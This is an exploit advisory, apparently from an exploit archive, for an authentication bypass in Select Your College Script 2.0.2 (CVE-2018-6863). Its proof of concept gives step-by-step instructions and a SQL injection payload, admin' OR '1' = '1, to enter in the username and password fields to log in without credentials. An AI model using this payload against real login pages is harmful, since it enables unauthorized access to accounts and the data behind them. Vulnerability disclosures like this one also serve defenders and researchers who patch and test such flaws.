Select Your College Script 2.0.2 Authentication Bypass

Select Your College Script version 2.0.2 suffers from an authentication bypass vulnerability.


MD5 | bba3e3b5a0aff683b276373acd2a7be5

######################################################################################
# Exploit Title: Select Your College Script - 2.0.2 - Authentication Bypass
# Date: 07.02.2018
# Vendor Homepage: https://www.phpscriptsmall.com/
# Software Link:https://www.phpscriptsmall.com/product/select-your-college-script/
# Category: Web Application
# Exploit Author: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 2.0.2
# Tested on: Linux Mint
# CVE: CVE-2018-6863
#######################################################################################

Proof of Concept

1. Goto login page
2. put [admin' OR '1' = '1] as user and password field
3. You will be logged in as an authenticated user


Related Posts

Comments